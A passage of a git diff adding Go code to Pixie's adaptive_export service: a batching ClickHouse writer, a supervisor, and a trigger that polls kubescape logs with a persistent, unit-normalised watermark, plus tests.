+ scannerCfg ScannerConfig,
+ writerCfg WriterConfig,
+) *Supervisor {
+ s := &Supervisor{
+ updater: updater,
+ tables: tables,
+ }
+ for _, t := range tables {
+ w := NewBatchWriter(t, sink, writerCfg)
+ c := scannerCfg
+ c.Table = t
+ sc := NewScanner(c, querier, w, updater.Subscribe())
+ s.scanners = append(s.scanners, sc)
+ s.writers = append(s.writers, w)
+ }
+ return s
+}
+
+// Run starts FilterUpdater + every scanner + every writer.
+// Blocks until ctx is cancelled, at which point all goroutines
+// drain and Run returns.
+func (s *Supervisor) Run(ctx context.Context) {
+ log.WithFields(log.Fields{
+ "tables": len(s.tables),
+ "goroutines": 1 + 2*len(s.tables),
+ }).Info("streaming.Supervisor: starting rev-3 push flow")
+
+ s.wg.Add(1)
+ go func() { defer s.wg.Done(); s.updater.Run(ctx) }()
+
+ for i := range s.scanners {
+ sc := s.scanners[i]
+ w := s.writers[i]
+ s.wg.Add(2)
+ go func() { defer s.wg.Done(); w.Run(ctx) }()
+ go func() { defer s.wg.Done(); sc.Run(ctx) }()
+ }
+ s.wg.Wait()
+}
diff --git a/src/vizier/services/adaptive_export/internal/streaming/writer.go b/src/vizier/services/adaptive_export/internal/streaming/writer.go
new file mode 100644
index 00000000000..313ab1ae4cf
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/writer.go
@@ -0,0 +1,154 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package streaming
+
+import (
+ "context"
+ "time"
+
+ log "github.com/sirupsen/logrus"
+)
+
+// SinkWriter is the abstraction over sink.WritePixieRows. Defining
+// it here avoids a sink package import cycle and lets tests inject
+// fakes.
+type SinkWriter interface {
+ WritePixieRows(ctx context.Context, table string, rows []map[string]any) error
+}
+
+// BatchWriter buffers per-table pixie rows and flushes them as one
+// CH INSERT either when the buffer hits BatchRows OR when BatchEvery
+// elapses since the last successful flush, whichever comes first.
+// One goroutine per BatchWriter.
+//
+// Why batching: rev-2's per-hash fan-out produced ~10 small INSERTs
+// per pass per pod. CH handles small INSERTs poorly (each spawns a
+// merge; merge throughput is the bottleneck on heavily-active
+// tables). One larger INSERT per N seconds dramatically reduces
+// merge pressure.
+type BatchWriter struct {
+ table string
+ sink SinkWriter
+ in chan []map[string]any
+ batchRows int
+ batchEvery time.Duration
+ bufferCap int
+}
+
+// WriterConfig tunes a BatchWriter. Zero → defaults.
+type WriterConfig struct {
+ BatchRows int // flush when buffered ≥ this many rows. default 10000.
+ BatchEvery time.Duration // flush when this much time has elapsed. default 5 s.
+ BufferCap int // input chan capacity (rows-of-batches). default 64.
+}
+
+func (c WriterConfig) defaulted() WriterConfig {
+ if c.BatchRows <= 0 {
+ c.BatchRows = 10000
+ }
+ if c.BatchEvery <= 0 {
+ c.BatchEvery = 5 * time.Second
+ }
+ if c.BufferCap <= 0 {
+ c.BufferCap = 64
+ }
+ return c
+}
+
+// NewBatchWriter constructs but does not start the writer.
+func NewBatchWriter(table string, sink SinkWriter, cfg WriterConfig) *BatchWriter {
+ cfg = cfg.defaulted()
+ return &BatchWriter{
+ table: table,
+ sink: sink,
+ in: make(chan []map[string]any, cfg.BufferCap),
+ batchRows: cfg.BatchRows,
+ batchEvery: cfg.BatchEvery,
+ bufferCap: cfg.BufferCap,
+ }
+}
+
+// Submit hands rows to the writer. Non-blocking — if the input chan
+// is full, the rows are DROPPED (oldest semantics handled at the
+// table-scanner level; per-call drop here is the simpler contract).
+// Returns true if accepted, false if dropped. Caller can log on drop.
+func (w *BatchWriter) Submit(rows []map[string]any) bool {
+ if len(rows) == 0 {
+ return true
+ }
+ select {
+ case w.in <- rows:
+ return true
+ default:
+ log.WithFields(log.Fields{
+ "table": w.table,
+ "rows": len(rows),
+ }).Warn("streaming.BatchWriter: input chan full, dropping batch")
+ return false
+ }
+}
+
+// Run owns the BatchWriter goroutine. Returns when ctx is cancelled,
+// after attempting a best-effort final flush.
+func (w *BatchWriter) Run(ctx context.Context) {
+ var buf []map[string]any
+ ticker := time.NewTicker(w.batchEvery)
+ defer ticker.Stop()
+
+ flush := func(reason string) {
+ if len(buf) == 0 {
+ return
+ }
+ // Bound the CH write so a stalled CH HTTP doesn't pin us.
+ fctx, cancel := context.WithTimeout(ctx, 60*time.Second)
+ err := w.sink.WritePixieRows(fctx, w.table, buf)
+ cancel()
+ if err != nil {
+ log.WithError(err).WithFields(log.Fields{
+ "table": w.table,
+ "rows": len(buf),
+ "reason": reason,
+ }).Warn("streaming.BatchWriter: flush failed")
+ } else {
+ log.WithFields(log.Fields{
+ "table": w.table,
+ "rows": len(buf),
+ "reason": reason,
+ }).Info("streaming.BatchWriter: flushed batch")
+ }
+ buf = buf[:0]
+ }
+
+ for {
+ select {
+ case <-ctx.Done():
+ flush("shutdown")
+ return
+
+ case rows := <-w.in:
+ buf = append(buf, rows...)
+ if len(buf) >= w.batchRows {
+ flush("size")
+ // Reset ticker so we don't get a redundant flush 100ms later
+ ticker.Reset(w.batchEvery)
+ }
+
+ case <-ticker.C:
+ flush("timer")
+ }
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/trigger/BUILD.bazel b/src/vizier/services/adaptive_export/internal/trigger/BUILD.bazel
new file mode 100644
index 00000000000..367e6acc1f0
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/BUILD.bazel
@@ -0,0 +1,45 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "trigger",
+ srcs = [
+ "clickhouse.go",
+ "watermark.go",
+ ],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/chhttp",
+ "//src/vizier/services/adaptive_export/internal/kubescape",
+ "@com_github_sirupsen_logrus//:logrus",
+ ],
+)
+
+pl_go_test(
+ name = "trigger_test",
+ srcs = [
+ "clickhouse_internal_test.go",
+ "clickhouse_test.go",
+ "fingerprint_bench_test.go",
+ "watermark_test.go",
+ ],
+ embed = [":trigger"],
+ deps = ["//src/vizier/services/adaptive_export/internal/kubescape"],
+)
diff --git a/src/vizier/services/adaptive_export/internal/trigger/clickhouse.go b/src/vizier/services/adaptive_export/internal/trigger/clickhouse.go
new file mode 100644
index 00000000000..63fbcd2a793
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/clickhouse.go
@@ -0,0 +1,498 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package trigger watches forensic_db.kubescape_logs for new rows and
+// pushes parsed kubescape.Event values onto a channel. Polls the
+// ClickHouse HTTP interface (default 250ms cadence). Operator runs as
+// a DaemonSet — each instance polls only its OWN node's rows via
+// `WHERE hostname = ''`.
+package trigger
+
+import (
+ "bufio"
+ "bytes"
+ "context"
+ "crypto/sha256"
+ "encoding/hex"
+ "encoding/json"
+ "fmt"
+ "io"
+ "net/http"
+ "net/url"
+ "regexp"
+ "strconv"
+ "strings"
+ "time"
+
+ log "github.com/sirupsen/logrus"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape"
+)
+
+// Config configures the trigger. PollInterval defaults to 250ms.
+// Hostname is REQUIRED — it scopes every poll to a single node.
+type Config struct {
+ Endpoint string
+ Database string
+ Table string
+ Username string
+ Password string
+ Hostname string
+ PollInterval time.Duration
+
+ // InitialWatermark is a fallback used ONLY when Watermark is nil
+ // AND the persistent store is also empty. The production wiring
+ // always supplies Watermark and leaves this zero.
+ InitialWatermark uint64
+
+ // Watermark, when non-nil, makes the trigger persistent across
+ // restarts: the first poll loads from the store; successful
+ // advances are saved back (throttled by WatermarkSaveInterval).
+ // nil → behaves like pre-watermark trigger (in-memory only,
+ // starts from InitialWatermark; previously the source of the
+ // "infinite full-table replay after OOM" bug).
+ Watermark WatermarkStore
+
+ // WatermarkSaveInterval throttles persistent writes — we'd
+ // otherwise INSERT every 250ms on a busy node. Default 5s.
+ WatermarkSaveInterval time.Duration
+
+ // PollLimit caps rows returned per poll. Bounds catch-up work
+ // after a restart so a 10h backlog doesn't translate into a
+ // single multi-GiB SELECT the HTTP client times out on; instead
+ // it drains in N polls of PollLimit rows. Default 10000.
+ // 0 → unlimited (legacy behavior — NOT recommended in prod).
+ PollLimit int
+
+ // HTTPTimeout bounds each individual poll. Default 30s; previously
+ // hardcoded to 5s, which under any backlog caused every poll to
+ // time out mid-stream → watermark never advanced.
+ HTTPTimeout time.Duration
+}
+
+// ClickHouseHTTP polls forensic_db. over the ClickHouse HTTP
+// interface, scoped to a single node.
+type ClickHouseHTTP struct {
+ cfg Config
+ client *http.Client
+}
+
+// New validates Config and returns a ready trigger.
+func New(cfg Config) (*ClickHouseHTTP, error) {
+ if cfg.Endpoint == "" {
+ return nil, fmt.Errorf("trigger: empty Endpoint")
+ }
+ if cfg.Hostname == "" {
+ return nil, fmt.Errorf("trigger: empty Hostname (operator must run node-local)")
+ }
+ u, err := url.Parse(cfg.Endpoint)
+ if err != nil {
+ return nil, fmt.Errorf("trigger: invalid Endpoint %q: %w", cfg.Endpoint, err)
+ }
+ if u.Scheme != "http" && u.Scheme != "https" {
+ return nil, fmt.Errorf("trigger: Endpoint %q must use http or https scheme", cfg.Endpoint)
+ }
+ if u.Host == "" {
+ return nil, fmt.Errorf("trigger: Endpoint %q has empty host", cfg.Endpoint)
+ }
+ if cfg.Database == "" {
+ cfg.Database = "forensic_db"
+ }
+ if cfg.Table == "" {
+ cfg.Table = "kubescape_logs"
+ }
+ // Validate Database / Table as plain ClickHouse identifiers
+ // (alphanumeric + underscore, not starting with a digit) so the
+ // SELECT in fetchSince cannot be subverted by an attacker-controlled
+ // Config. Hostname is value-quoted via quoteCH; identifiers cannot
+ // be parameterised, hence validation here.
+ if !validIdentifier(cfg.Database) {
+ return nil, fmt.Errorf("trigger: invalid Database identifier %q (must match [A-Za-z_][A-Za-z0-9_]*)", cfg.Database)
+ }
+ if !validIdentifier(cfg.Table) {
+ return nil, fmt.Errorf("trigger: invalid Table identifier %q (must match [A-Za-z_][A-Za-z0-9_]*)", cfg.Table)
+ }
+ if cfg.PollInterval <= 0 {
+ cfg.PollInterval = 250 * time.Millisecond
+ }
+ if cfg.WatermarkSaveInterval <= 0 {
+ cfg.WatermarkSaveInterval = 5 * time.Second
+ }
+ if cfg.PollLimit < 0 {
+ return nil, fmt.Errorf("trigger: PollLimit must be >= 0 (got %d)", cfg.PollLimit)
+ }
+ if cfg.PollLimit == 0 {
+ cfg.PollLimit = 10000
+ }
+ if cfg.HTTPTimeout <= 0 {
+ cfg.HTTPTimeout = 30 * time.Second
+ }
+ return &ClickHouseHTTP{
+ cfg: cfg,
+ client: &http.Client{Timeout: cfg.HTTPTimeout},
+ }, nil
+}
+
+// identifierRE accepts plain ClickHouse identifiers — letters, digits,
+// underscores; not starting with a digit. Dotted identifiers (e.g.
+// "http2_messages.beta") are deliberately rejected here because the
+// trigger only ever queries the kubescape ingest table, not a pixie
+// observation table.
+var identifierRE = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`)
+
+func validIdentifier(s string) bool { return identifierRE.MatchString(s) }
+
+// Subscribe starts the background poll loop. The returned channel
+// produces kubescape.Event values until ctx is cancelled, then closes.
+func (t *ClickHouseHTTP) Subscribe(ctx context.Context) (<-chan kubescape.Event, error) {
+ out := make(chan kubescape.Event, 64)
+ go t.run(ctx, out)
+ return out, nil
+}
+
+func (t *ClickHouseHTTP) run(ctx context.Context, out chan<- kubescape.Event) {
+ defer close(out)
+ // Watermark uses event_time as the cursor PLUS a set of row
+ // fingerprints already pushed at that exact event_time. This
+ // closes the race where two kubescape rows share the same
+ // event_time but the second arrives after our previous poll: the
+ // query is `event_time >= watermark` (inclusive) and we skip rows
+ // whose fingerprint we have already seen at the boundary.
+ //
+ // Cold-start order: persistent store > InitialWatermark > 0.
+ // The persistent store is the production answer to "operator
+ // OOMed, restarts, replays 10h of kubescape_logs from 0, every
+ // poll times out, never recovers" — without it any restart on
+ // a busy node is permanently stuck.
+ watermark := t.cfg.InitialWatermark
+ if t.cfg.Watermark != nil {
+ // Bound the load with its own context so a flaky CH doesn't
+ // block start-up indefinitely. The trigger then falls back
+ // to InitialWatermark and we log the failure loudly.
+ loadCtx, cancel := context.WithTimeout(ctx, t.cfg.HTTPTimeout)
+ wm, ok, err := t.cfg.Watermark.Load(loadCtx, t.cfg.Hostname, t.cfg.Table)
+ cancel()
+ switch {
+ case err != nil:
+ log.WithError(err).Warn("trigger: persistent watermark load failed; using InitialWatermark")
+ case ok:
+ watermark = wm
+ log.WithField("watermark", wm).Info("trigger: resumed from persistent watermark")
+ default:
+ log.WithField("initial", t.cfg.InitialWatermark).
+ Info("trigger: no persistent watermark; using InitialWatermark")
+ }
+ }
+ // Cursor is canonical NANOS (F8). Normalize whatever we loaded so a
+ // pre-fix persisted seconds watermark (or a non-seconds InitialWatermark)
+ // is interpreted on the same scale as chNormEventTimeNanos in the SQL.
+ watermark = normalizeEventTimeNanos(watermark)
+ seenAtBoundary := map[string]bool{}
+ ticker := time.NewTicker(t.cfg.PollInterval)
+ defer ticker.Stop()
+
+ // Throttle persistent writes: every successful advance is in
+ // memory immediately, but only flushed to CH at most every
+ // WatermarkSaveInterval. dirty tracks whether the in-memory
+ // watermark differs from what was last persisted.
+ //
+ // The flush is invoked INSIDE pollOnce (not from a ticker case
+ // in the for/select), because the initial pollOnce on a busy
+ // node can block for tens of seconds while it drains 10k events
+ // down a back-pressured channel — during which time the for/
+ // select isn't running and a saveTicker.C tick would never be
+ // observed. Throttling is done with a time.Time comparison.
+ lastSaved := watermark
+ var lastSaveTime time.Time
+ dirty := false
+ flushWatermark := func() {
+ if !dirty || t.cfg.Watermark == nil || watermark == lastSaved {
+ return
+ }
+ if !lastSaveTime.IsZero() && time.Since(lastSaveTime) < t.cfg.WatermarkSaveInterval {
+ return
+ }
+ saveCtx, cancel := context.WithTimeout(ctx, t.cfg.HTTPTimeout)
+ err := t.cfg.Watermark.Save(saveCtx, t.cfg.Hostname, t.cfg.Table, watermark)
+ cancel()
+ if err != nil {
+ log.WithError(err).WithField("watermark", watermark).
+ Warn("trigger: persistent watermark save failed; will retry next interval")
+ return
+ }
+ lastSaved = watermark
+ lastSaveTime = time.Now()
+ dirty = false
+ }
+ // Best-effort final flush so a clean shutdown doesn't lose up
+ // to WatermarkSaveInterval of progress.
+ defer func() {
+ if t.cfg.Watermark != nil && dirty {
+ saveCtx, cancel := context.WithTimeout(context.Background(), t.cfg.HTTPTimeout)
+ defer cancel()
+ if err := t.cfg.Watermark.Save(saveCtx, t.cfg.Hostname, t.cfg.Table, watermark); err != nil {
+ log.WithError(err).Warn("trigger: shutdown watermark save failed")
+ }
+ }
+ }()
+
+ pollOnce := func() {
+ rows, maxSeen, err := t.fetchSince(ctx, watermark)
+ // Partial-read tolerance: when the body read is cut short by
+ // HTTP timeout / connection reset, fetchSince returns the rows
+ // it managed to parse + err. We still process those rows so
+ // the watermark advances by what we got; failing to do so was
+ // the second half of the "stuck forever" bug.
+ if err != nil {
+ if len(rows) == 0 {
+ log.WithError(err).Warn("trigger: poll failed")
+ return
+ }
+ log.WithError(err).WithField("partial_rows", len(rows)).
+ Warn("trigger: poll partial — advancing on what parsed")
+ }
+ nextSeen := map[string]bool{}
+ // Periodic in-loop save: when pollOnce is draining a large
+ // initial backlog, the watermark advances long before the
+ // loop exits. Calling flushWatermark every N rows means the
+ // persistent watermark catches up even mid-drain, so a crash
+ // during the drain doesn't replay the whole backlog. Combined
+ // with the time-based throttle inside flushWatermark, this
+ // produces at most one persistent INSERT per WatermarkSaveInterval.
+ const saveEveryN = 256
+ skippedAtBoundary := 0
+ for i, row := range rows {
+ fp := rowFingerprint(row)
+ // Cursor comparisons are in NORMALIZED nanos (F8): the raw
+ // event_time unit is not enforced, so compare on the same scale
+ // as the SQL filter (chNormEventTimeNanos) and maxSeen.
+ evn := normalizeEventTimeNanos(row.EventTime)
+ if evn == watermark && seenAtBoundary[fp] {
+ skippedAtBoundary++
+ continue // already pushed in a prior poll at this exact boundary
+ }
+ ev, err := kubescape.Extract(row)
+ if err != nil {
+ log.WithError(err).Debug("trigger: skip incomplete row")
+ continue
+ }
+ // Promote the per-row (normalized) event_time into the watermark
+ // immediately so flushWatermark below can persist mid-drain.
+ if evn > watermark {
+ watermark = evn
+ dirty = true
+ }
+ select {
+ case out <- ev:
+ case <-ctx.Done():
+ return
+ }
+ if evn == maxSeen {
+ nextSeen[fp] = true
+ }
+ if i > 0 && i%saveEveryN == 0 {
+ flushWatermark()
+ }
+ }
+ if maxSeen > watermark {
+ watermark = maxSeen
+ seenAtBoundary = nextSeen
+ dirty = true
+ } else if maxSeen == watermark {
+ // no progress this tick — preserve boundary set, optionally extend
+ for fp := range nextSeen {
+ seenAtBoundary[fp] = true
+ }
+ // Paging escape: if every row returned was a boundary-skip AND
+ // the response was at PollLimit capacity, there may be additional
+ // rows at the same normalized event_time that we will never reach
+ // (the SQL ORDER BY has no secondary key, so LIMIT always returns
+ // the same PollLimit rows from the boundary). Advance the watermark
+ // by 1 nanosecond to escape the boundary. In practice this means
+ // at most one nanosecond's worth of events are not re-delivered on
+ // the next poll, which is acceptable: the fingerprint dedup already
+ // tolerates boundary overlap, and we prefer forward progress over
+ // an infinite loop.
+ if skippedAtBoundary > 0 && len(nextSeen) == 0 && len(rows) >= t.cfg.PollLimit {
+ watermark++
+ seenAtBoundary = map[string]bool{}
+ dirty = true
+ log.WithField("watermark", watermark).
+ Warn("trigger: boundary paging escape — advanced watermark by 1ns to unblock poll")
+ }
+ }
+ // Final flush at end of pollOnce — also throttled.
+ flushWatermark()
+ }
+
+ pollOnce()
+ for {
+ select {
+ case <-ctx.Done():
+ return
+ case <-ticker.C:
+ pollOnce()
+ }
+ }
+}
+
+// rowFingerprint hashes the row's content so we can dedupe at the
+// watermark boundary without trusting kubescape to give us a unique row id.
+func rowFingerprint(r kubescape.Row) string {
+ h := sha256.New()
+ _, _ = fmt.Fprintf(h, "%d\x00%s\x00%s\x00%s\x00%s",
+ r.EventTime, r.RuleID, r.Hostname, r.K8sDetails, r.ProcessDetails)
+ return hex.EncodeToString(h.Sum(nil))
+}
+
+// normalizeEventTimeNanos maps a raw kubescape event_time (UInt64, whose unit
+// the pipeline does not enforce) to canonical UNIX NANOSECONDS using the same
+// magnitude thresholds as controller.eventTimeToTime. This is the fix for the
+// watermark-poison bug (FINDINGS_AND_BACKLOG F8): the trigger's cursor is a
+// monotonic high-water-mark, so without a single canonical unit a stray row in
+// a larger unit (e.g. one nanos row, ~1.78e18) drives the watermark past every
+// real seconds row (~1.78e9) and AE silently stops processing forever. The
+// cursor + the SQL filter both operate on the normalized value so units are
+// always comparable.
+func normalizeEventTimeNanos(et uint64) uint64 {
+ switch {
+ case et < 1e10:
+ return et * 1_000_000_000 // seconds → nanos
+ case et < 1e13:
+ return et * 1_000_000 // millis → nanos
+ default:
+ return et // already nanos
+ }
+}
+
+// chNormEventTimeNanos is the ClickHouse expression equivalent of
+// normalizeEventTimeNanos — used in the trigger SELECT so the >= watermark
+// filter and ORDER BY are unit-agnostic server-side. (UInt64 headroom: the
+// largest pre-normalization input that hits the *1e9 branch is <1e10, so the
+// product is <1e19 < 2^64.)
+const chNormEventTimeNanos = "multiIf(event_time < 10000000000, event_time * 1000000000, " +
+ "event_time < 10000000000000, event_time * 1000000, event_time)"
+
+func (t *ClickHouseHTTP) fetchSince(ctx context.Context, watermark uint64) ([]kubescape.Row, uint64, error) {
+ q := url.Values{}
+ // LIMIT bounds per-poll work. ORDER BY event_time + LIMIT N means
+ // catch-up from a stale watermark drains in ceil(backlog/N) polls
+ // of small responses instead of one giant scan. Without this, an
+ // operator that restarted into a multi-hour backlog could never
+ // recover — every unbounded query exceeded HTTPTimeout.
+ // Filter + order on the NORMALIZED (nanos) event_time so the watermark
+ // cursor is unit-agnostic (F8 fix). watermark is already in nanos.
+ q.Set("query", fmt.Sprintf(
+ "SELECT RuleID, RuntimeK8sDetails, RuntimeProcessDetails, event_time, hostname "+
+ "FROM %s.%s "+
+ "WHERE hostname = %s AND %s >= %d "+
+ "ORDER BY %s LIMIT %d FORMAT JSONEachRow",
+ t.cfg.Database, t.cfg.Table, quoteCH(t.cfg.Hostname),
+ chNormEventTimeNanos, watermark, chNormEventTimeNanos, t.cfg.PollLimit))
+ req, err := http.NewRequestWithContext(ctx, http.MethodGet,
+ t.cfg.Endpoint+"/?"+q.Encode(), nil)
+ if err != nil {
+ return nil, 0, err
+ }
+ if t.cfg.Username != "" {
+ req.SetBasicAuth(t.cfg.Username, t.cfg.Password)
+ }
+ resp, err := t.client.Do(req)
+ if err != nil {
+ return nil, 0, err
+ }
+ defer resp.Body.Close()
+ if resp.StatusCode/100 != 2 {
+ body, _ := io.ReadAll(io.LimitReader(resp.Body, 4096))
+ return nil, 0, fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(body)))
+ }
+ return parseJSONEachRow(resp.Body)
+}
+
+// parseJSONEachRow streams JSONEachRow output line-by-line from r.
+// Streaming (vs io.ReadAll into a []byte) bounds memory at one row
+// regardless of how large the ClickHouse result set is.
+//
+// Malformed rows are LOGGED + SKIPPED, never fatal: a single bad line
+// must not block watermark advancement and re-pin the bad row on every
+// subsequent poll. Only an unrecoverable scanner error (e.g. line
+// exceeds the 16 MiB buffer) fails the call.
+func parseJSONEachRow(r io.Reader) ([]kubescape.Row, uint64, error) {
+ type rawRow struct {
+ RuleID string `json:"RuleID"`
+ RuntimeK8sDetails string `json:"RuntimeK8sDetails"`
+ RuntimeProcessDetails string `json:"RuntimeProcessDetails"`
+ EventTime json.RawMessage `json:"event_time"`
+ Hostname string `json:"hostname"`
+ }
+ var (
+ rows []kubescape.Row
+ maxSeen uint64
+ )
+ scanner := bufio.NewScanner(r)
+ scanner.Buffer(make([]byte, 1<<20), 1<<24)
+ for scanner.Scan() {
+ line := bytes.TrimSpace(scanner.Bytes())
+ if len(line) == 0 {
+ continue
+ }
+ var rr rawRow
+ if err := json.Unmarshal(line, &rr); err != nil {
+ log.WithError(err).Debug("trigger: skip malformed JSON row")
+ continue
+ }
+ ev, err := parseUint64Loose(rr.EventTime)
+ if err != nil {
+ log.WithError(err).Debug("trigger: skip row with bad event_time")
+ continue
+ }
+ rows = append(rows, kubescape.Row{
+ EventTime: ev,
+ RuleID: rr.RuleID,
+ Hostname: rr.Hostname,
+ K8sDetails: rr.RuntimeK8sDetails,
+ ProcessDetails: rr.RuntimeProcessDetails,
+ })
+ // maxSeen is the cursor max in NORMALIZED nanos (F8): with an
+ // unenforced unit the raw max is not necessarily the time-max.
+ if n := normalizeEventTimeNanos(ev); n > maxSeen {
+ maxSeen = n
+ }
+ }
+ if err := scanner.Err(); err != nil {
+ // Partial-read tolerance: return whatever parsed cleanly along
+ // with the error so the caller can still advance the watermark.
+ // Without this, an HTTP body read cut off mid-stream (the
+ // classic 5s-timeout-on-2GB-response failure mode) discarded
+ // ~all parsed rows and pinned the watermark in place.
+ return rows, maxSeen, err
+ }
+ return rows, maxSeen, nil
+}
+
+func parseUint64Loose(raw json.RawMessage) (uint64, error) {
+ s := strings.TrimSpace(string(raw))
+ s = strings.Trim(s, `"`)
+ return strconv.ParseUint(s, 10, 64)
+}
+
+// chLiteralEscaper — hoisted to a package-level var so we don't allocate
+// a Replacer per call (quoteCH is hot in rowFingerprint).
+var chLiteralEscaper = strings.NewReplacer(`\`, `\\`, `'`, `\'`)
+
+func quoteCH(s string) string {
+ return "'" + chLiteralEscaper.Replace(s) + "'"
+}
diff --git a/src/vizier/services/adaptive_export/internal/trigger/clickhouse_internal_test.go b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_internal_test.go
new file mode 100644
index 00000000000..8ca780fc3db
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_internal_test.go
@@ -0,0 +1,104 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package trigger
+
+import (
+ "context"
+ "net/http"
+ "net/http/httptest"
+ "strconv"
+ "strings"
+ "sync"
+ "testing"
+ "time"
+)
+
+// TestNormalizeEventTimeNanos pins the unit normalization at the current epoch
+// (the magnitude heuristic is exact for present-day timestamps). This is the
+// core of the F8 fix: seconds, millis and nanos all map to the SAME nanos scale,
+// so a mixed-unit row cannot drive the watermark past real seconds rows.
+func TestNormalizeEventTimeNanos(t *testing.T) {
+ const sec = uint64(1781590000) // ~now in seconds
+ const milli = uint64(1781590000_000) // same instant in millis
+ const nano = uint64(1781590000_000000000) // same instant in nanos
+ cases := []struct {
+ in, want uint64
+ }{
+ {sec, nano},
+ {milli, nano},
+ {nano, nano},
+ {0, 0},
+ }
+ for _, c := range cases {
+ if got := normalizeEventTimeNanos(c.in); got != c.want {
+ t.Errorf("normalizeEventTimeNanos(%d) = %d, want %d", c.in, got, c.want)
+ }
+ }
+ // All three units for the SAME instant must collapse to one value, so the
+ // HWM cursor is unit-agnostic.
+ if normalizeEventTimeNanos(sec) != normalizeEventTimeNanos(nano) ||
+ normalizeEventTimeNanos(milli) != normalizeEventTimeNanos(nano) {
+ t.Fatalf("same-instant s/ms/ns did not normalize equal: s=%d ms=%d ns=%d",
+ normalizeEventTimeNanos(sec), normalizeEventTimeNanos(milli), normalizeEventTimeNanos(nano))
+ }
+}
+
+// TestFetchSinceFiltersOnNormalizedEventTime asserts the trigger SELECT gates on
+// the NORMALIZED event_time (server-side), not the raw column — the fix that
+// stops a larger-unit row from poisoning the watermark (F8). It captures the
+// query the trigger sends to ClickHouse.
+func TestFetchSinceFiltersOnNormalizedEventTime(t *testing.T) {
+ var mu sync.Mutex
+ var gotQuery string
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ q := r.URL.Query().Get("query")
+ mu.Lock()
+ gotQuery = q
+ mu.Unlock()
+ w.WriteHeader(200) // empty body = 0 rows, valid JSONEachRow
+ }))
+ defer srv.Close()
+
+ trg, err := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: time.Second})
+ if err != nil {
+ t.Fatalf("New: %v", err)
+ }
+
+ const wmNanos = uint64(1781590000_000000000)
+ ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+ defer cancel()
+ if _, _, err := trg.fetchSince(ctx, wmNanos); err != nil {
+ t.Fatalf("fetchSince: %v", err)
+ }
+
+ mu.Lock()
+ q := gotQuery
+ mu.Unlock()
+
+ if !strings.Contains(q, chNormEventTimeNanos) {
+ t.Errorf("query does not normalize event_time; want %q in:\n%s", chNormEventTimeNanos, q)
+ }
+ // The >= bound must compare the normalized expression against the nanos
+ // watermark, not the raw column.
+ wantPred := chNormEventTimeNanos + " >= " + strconv.FormatUint(wmNanos, 10)
+ if !strings.Contains(q, wantPred) {
+ t.Errorf("query filter is not normalized-vs-nanos-watermark; want %q in:\n%s", wantPred, q)
+ }
+ if strings.Contains(q, "event_time >= ") {
+ t.Errorf("query still uses RAW event_time filter (poison-prone):\n%s", q)
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/trigger/clickhouse_test.go b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_test.go
new file mode 100644
index 00000000000..0595e67392f
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_test.go
@@ -0,0 +1,243 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
